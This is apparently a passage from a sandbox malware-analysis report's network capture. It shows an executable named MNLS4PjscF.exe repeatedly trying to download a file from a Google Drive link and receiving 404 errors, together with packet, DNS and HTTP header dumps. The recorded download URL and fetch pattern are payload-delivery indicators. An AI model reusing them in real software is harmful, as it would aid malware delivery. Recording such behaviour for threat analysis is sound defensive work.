                                                    Mar 7, 2025 23:31:17.736975908 CET44349700142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:17.750025034 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:17.750066042 CET44349701142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:17.750133991 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:17.750544071 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:17.750560045 CET44349701142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:19.483727932 CET44349701142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:19.483829975 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:19.485981941 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:19.485996008 CET44349701142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:19.486358881 CET44349701142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:19.486428976 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:19.487102032 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:19.532345057 CET44349701142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:20.229494095 CET44349701142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:20.229672909 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:20.229697943 CET44349701142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:20.229758024 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:20.240776062 CET44349701142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:20.240875959 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:20.240904093 CET44349701142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:20.240947008 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:20.241081953 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:20.241127014 CET44349701142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:20.241175890 CET49701443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:20.345261097 CET49702443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:20.345318079 CET44349702142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:20.345405102 CET49702443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:20.345750093 CET49702443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:20.345765114 CET44349702142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:22.197532892 CET44349702142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:22.197607994 CET49702443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:22.198215961 CET49702443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:22.198221922 CET44349702142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:22.198425055 CET49702443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:22.198429108 CET44349702142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:22.928880930 CET44349702142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:22.928955078 CET44349702142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:22.929027081 CET49702443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:22.929090023 CET49702443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:22.929363012 CET49702443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:22.929378033 CET44349702142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:22.929409027 CET49702443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:22.929426908 CET49702443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:22.950352907 CET49703443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:22.950409889 CET44349703142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:22.950484037 CET49703443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:22.950731993 CET49703443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:22.950742960 CET44349703142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:24.813858032 CET44349703142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:24.813971996 CET49703443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:24.818639040 CET49703443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:24.818650007 CET44349703142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:24.819037914 CET44349703142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:24.819231987 CET49703443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:24.820133924 CET49703443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:24.864327908 CET44349703142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:25.585594893 CET44349703142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:25.585632086 CET44349703142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:25.585728884 CET49703443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:25.585752964 CET44349703142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:25.585763931 CET49703443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:25.585803032 CET49703443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:25.587214947 CET49703443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:25.587383032 CET44349703142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:25.587459087 CET49703443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:25.704617023 CET49704443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:25.704653025 CET44349704142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:25.704746962 CET49704443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:25.705209970 CET49704443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:25.705218077 CET44349704142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:27.488532066 CET44349704142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:27.488789082 CET49704443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:27.489296913 CET49704443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:27.489310980 CET44349704142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:27.489507914 CET49704443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:27.489512920 CET44349704142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:28.142894983 CET44349704142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:28.142978907 CET44349704142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:28.142985106 CET49704443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:28.143049955 CET49704443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:28.430843115 CET49704443192.168.2.7142.250.186.142
                                                    Mar 7, 2025 23:31:28.430938005 CET44349704142.250.186.142192.168.2.7
                                                    Mar 7, 2025 23:31:28.441260099 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:28.441320896 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:28.441385031 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:28.442164898 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:28.442181110 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:30.253350019 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:30.253443003 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:30.255652905 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:30.255661964 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:30.255916119 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:30.255978107 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:30.256649971 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:30.300338030 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:31.017780066 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:31.017858028 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:31.017870903 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:31.017916918 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:31.017919064 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:31.017951012 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:31.017983913 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:31.017993927 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:31.018026114 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:31.018081903 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:31.020531893 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:31.020591974 CET49705443192.168.2.7142.250.186.33
                                                    Mar 7, 2025 23:31:31.020678043 CET44349705142.250.186.33192.168.2.7
                                                    Mar 7, 2025 23:31:31.020728111 CET49705443192.168.2.7142.250.186.33
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 7, 2025 23:30:44.301100016 CET5408053192.168.2.71.1.1.1
                                                    Mar 7, 2025 23:30:44.308722019 CET53540801.1.1.1192.168.2.7
                                                    Mar 7, 2025 23:30:47.036686897 CET5682153192.168.2.71.1.1.1
                                                    Mar 7, 2025 23:30:47.043759108 CET53568211.1.1.1192.168.2.7
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Mar 7, 2025 23:30:44.301100016 CET192.168.2.71.1.1.10xc5caStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                    Mar 7, 2025 23:30:47.036686897 CET192.168.2.71.1.1.10xb268Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Mar 7, 2025 23:30:44.308722019 CET1.1.1.1192.168.2.70xc5caNo error (0)drive.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                    Mar 7, 2025 23:30:47.043759108 CET1.1.1.1192.168.2.70xb268No error (0)drive.usercontent.google.com142.250.186.33A (IP address)IN (0x0001)false
                                                    • drive.google.com
                                                    • drive.usercontent.google.com
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.749688142.250.186.1424435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:30:46 UTC216OUTGET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    2025-03-07 22:30:47 UTC1610INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:30:46 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-v7REsDB1tf33vLS_UZYsZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.749689142.250.186.334435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:30:48 UTC258OUTGET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    2025-03-07 22:30:49 UTC1926INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AKDAyIuN8ZUfOvJohGwebJsZMZ2an8uz0KiL4iotDf8dfkhWAWNLJol3R_d_b5HLe8JxWsCRzx3WAFo
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:30:49 GMT
                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                    Content-Security-Policy: script-src 'nonce-CiocIO1INPLh4xtvZkMR7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Set-Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA; expires=Sat, 06-Sep-2025 22:30:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-03-07 22:30:49 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 65 41 72 4f 38 63 72 73 4e 59 62 49 78 61 30 52 31 4d 66 68 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TeArO8crsNYbIxa0R1Mfhg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.749690142.250.186.1424435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:30:51 UTC428OUTGET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:30:52 UTC1610INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:30:51 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-UEIBpNo8Dxw7v8GnlSDknA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.749691142.250.186.334435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:30:53 UTC470OUTGET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:30:54 UTC1533INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AKDAyIueAmsvM7F3cElPMqP19Db6f5FdYwo76t8n5dgztEtS_yFsj4MbB0jH9NVEneEYMhk
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:30:54 GMT
                                                    Content-Security-Policy: script-src 'nonce-4fkLeAGDX0f0Jph-V75TJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-03-07 22:30:54 UTC1533INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 50 5a 6d 78 34 62 69 36 36 6c 52 6e 38 61 49 2d 6b 43 45 5a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kPZmx4bi66lRn8aI-kCEZw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                    2025-03-07 22:30:54 UTC119INData Raw: 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                    Data Ascii: <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.749692142.250.186.1424435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:30:56 UTC428OUTGET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:30:57 UTC1610INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 07 Mar 2025 22:30:56 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-ChR8u5N5613L21qKWN658w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.749693142.250.186.334435684C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-07 22:30:58 UTC470OUTGET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
                                                    2025-03-07 22:30:59 UTC1534INHTTP/1.1 404 Not Found
